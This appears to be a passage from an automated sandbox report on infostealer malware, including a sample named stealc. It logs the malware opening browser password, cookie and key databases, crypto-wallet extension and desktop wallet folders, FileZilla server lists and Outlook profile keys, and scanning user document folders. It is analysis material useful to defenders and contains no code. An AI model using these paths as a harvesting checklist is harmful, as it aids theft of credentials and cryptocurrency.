Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\WSHEJMDVQC
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\WHZAGPPPLA
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DQOFHVHTMG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\ERWQDBYZVW
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\PWZOQIFCAN
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\BUFZSQPCOH
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\DUKNXICOZT
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\GLTYDMDUST
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
